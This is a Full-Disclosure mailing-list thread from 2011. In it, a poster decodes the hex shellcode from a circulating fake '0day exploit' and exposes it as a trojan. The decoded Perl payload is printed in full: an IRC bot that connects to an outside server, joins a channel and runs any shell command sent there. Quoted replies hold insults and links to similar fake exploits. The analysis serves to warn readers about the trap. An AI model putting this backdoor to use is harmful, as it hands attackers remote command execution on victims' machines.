Re: I know its old, but what the heck does this do... (exposing a tool...)

[Flavio do Carmo Junior <carmo.flavio () gmail com>]

sounds really useful...

[waKKu@1215n ~]$ python -c 'hellcode=(
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print hellcode;'
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi
[waKKu@1215n ~]$

print hellcode[764:];'
/tmp/hi


--

On 26 October 2011 13:49, xD 0x41 <secn3t () gmail com> wrote:
> yer ofc... anyhow, ignoring you now...
>
> you obv think your some leet troll, your not, your ONLY a TROLL :)
> have a nice day or is that
>
> *Goplamamamama Ignananayu*
>
> forget the jedi oky, you gotta brushup on ya troll trash talk!
> bah hahaha.
> fool
> xd
>
>
> On 26 October 2011 13:44, Antony widmal <antony.widmal () gmail com> wrote:
> > Using your smartphone while flipping burger can be dangerous pandawan.
> > More over if you work at burger king.
> >
> >
> >
> > On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t () gmail com> wrote:
> > > h the idiot who thinks im laurelai... meh , your a fool yourself just for
> > > even thinking that much :s
> > > your but an echo on the list, wich, does not echo the rest of it, wich is
> > > a good place to be.
> > > unfortunately, your one of the few who should just be blocked, for making
> > > absolutely nothing but abusive crap...
> > > your an idiot. not me.
> > > i dont run things, why, have you ran it ?
> > > Is it good ?
> > > hehe... maybe it is!
> > > i guess if hes using it...well...
> > > *sic*
> > >
> > >
> > >
> > > On 26 October 2011 13:21, Antony widmal <antony.widmal () gmail com> wrote:
> > > > Do yourself a favor and run that code dumbass.
> > > >
> > > > On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t () gmail com> wrote:
> > > > > I use darknets to help me,
> > > > > they send me the info i need.
> > > > > simple answer to simple question.
> > > > > look them up, they may oneday protect you, also.
> > > > >
> > > > >
> > > > > On 26 October 2011 13:15, adam <adam () papsy net> wrote:
> > > > > > http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
> > > > > > claims to be a remote kernel root exploit)
> > > > > > http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
> > > > > > similar code, claims to be an IIS exploit)
> > > > > > http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
> > > > > > thread, code is mentioned though)
> > > > > > I'm sure there's more, but this kinda reminds me of that leaked
> > > > > > "private exploit" on pastebin a few weeks back (you know, the one that was
> > > > > > nice enough to create a _local_ root account), and insisted that it was
> > > > > > private private private and specifically said NOT to leak it.
> > > > > > I am curious as to how you're so certain that it's on "many many
> > > > > > boxes" yet know next to nothing about it.
> > > > > > On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t () gmail com> wrote:
> > > > > > > Hello List,
> > > > > > > Id like people to also, like this thread asks, to pls give some
> > > > > > > opinion, other than mine.. wich, i am yet to make;
> > > > > > >
> > > > > > > http://www.hackerthreads.org/Topic-5973
> > > > > > >
> > > > > > > Please look at this .c code on here, if you wish, and tell me, why
> > > > > > > A. It is still in circulation, seeminlgly, on MANY MANY boxes....
> > > > > > > B. people still seem to try keep it private :s
> > > > > > >
> > > > > > > This morning, a friend from webhostingtalk.com ,asked me to take a
> > > > > > > look.
> > > > > > > I have and, i can only sofar say, once i decrypt the shellcode, ill
> > > > > > > know abit more..
> > > > > > > altho , i rmember this thing, and, somany people were after it,
> > > > > > > people were paying for it, this is first time i have seen it actually
> > > > > > > disclosed tho,
> > > > > > > admittedly only looked today.
> > > > > > > If skiddies are using it to ddos things, I want to makesure i can
> > > > > > > expose it, and kill the threats.
> > > > > > > thankyou.
> > > > > > > xd .// exposing bullshit as i ride!
> > > > > > >
> > > > > > >
> > > > > > > _______________________________________________
> > > > > > > Full-Disclosure - We believe in it.
> > > > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > > >
> > > > >
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
--
Best regards,

Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/